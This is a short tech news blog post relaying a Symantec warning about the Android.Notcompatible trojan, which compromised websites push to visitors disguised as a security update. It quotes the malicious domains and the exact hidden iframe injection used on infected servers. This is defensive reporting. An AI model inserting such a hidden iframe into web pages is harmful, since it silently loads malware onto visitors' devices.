Android Malware
Android Malware
Image source: wmpoweruser

Android users beware! Symantec Security Response has detected a new Android malware spreading via infected websites. Symantec urges Android users to be aware of the threat and be careful when visiting unknown sites.

[ad#Google Adsense 336×280]

 

Symantec has observed a new Android malware threat being distributed by a handful of infected websites. Full details on this threat, detected by Symantec as Android.Notcompatible, can be found here: http://www.symantec.com/connect/blogs/website-injection-campaign-used-conjunction-android-trojan.

Android Malware

When a user visits an infected site, this Trojan is automatically downloaded to their device. Unlike a traditional drive-by download, however, the user must still manually agree to install this threat. Therefore, it has been disguised as a device security update. The threat then allows its creator to reroute data traffic from an infected device to a third-party destination.

Devices that allow installation from ’Unknown Sources’ are most susceptible to this type of attack as the user has to manually accept the permissions and prompts that are requested prior to an installation.

Extract from Symantec blog:

[quote] The following domains have been identified so far based on our investigation:

  • [http://]androidbia.info
  • [http://]androidjea.info
  • [http://]gaoanalitics.info
  • [http://]androidonlinefix.info

The website injection is of the form:

<iframe style=”visibility: hidden; display: none; display: none;”
src=”[http://]gaoanalitics.info/?id=[CLSID]”>;
</iframe>

This injection has been identified not only on HTML sites, but also in robots.txt files. Therefore, it could well be the case that all files on the compromised Web server will have this iframe appended to it.[/quote]

READ ALSO  5 Useful Add-ons for your Google Chrome

This threat highlights how mobile malware authors are moving beyond traditional “smash-and-grab” activities, such as premium SMS scams, and towards more sophisticated assaults, such as theft of sensitive information.

Tags:

  • Designer. Writer. Webhead. Tech geek. Twitter-addict. Apple. Animal lover. Steve Jobs groupie. Petrolhead. BMW. Porsche. Alfisti. Chelsea FC.

  • Show Comments (0)

You May Also Like

Metal Gear Solid’s New Engine to be unveiled on August 30 2012

The ‘Great Creator’ of Metal Gear Solid, Hideo Kojima has spoken to PlayStation Blog ...

PlayStation Network Down by Unknown Cause…

  Sony posted on its forum stating, “At the moment PlayStation Network is currently ...

Spotify

Spotify hits 83M paid subscribers, 180M total monthly users

In its Q2 2018 earnings report, Spotify revealed that it has grown to 180 ...

microsoft-logo

Microsoft Wins Copyright Lawsuit Against Malaysian Computer Dealer

After a 3-day trial, Microsoft Corporation(“Microsoft”) wins a civil lawsuit against local computer dealer Vital ...

Mi Store Suria KLCC

Xiaomi opens its Mi Store at KLCC today, here’s what it looks like

Xiaomi continues the expansion of its physical retail presence in Malaysia with the opening ...

Dubai Hoversurf

Police bikes are last century; Dubai police get hoverbikes

The Dubai police force may soon be adopting the use of fully functional hoverbikes. ...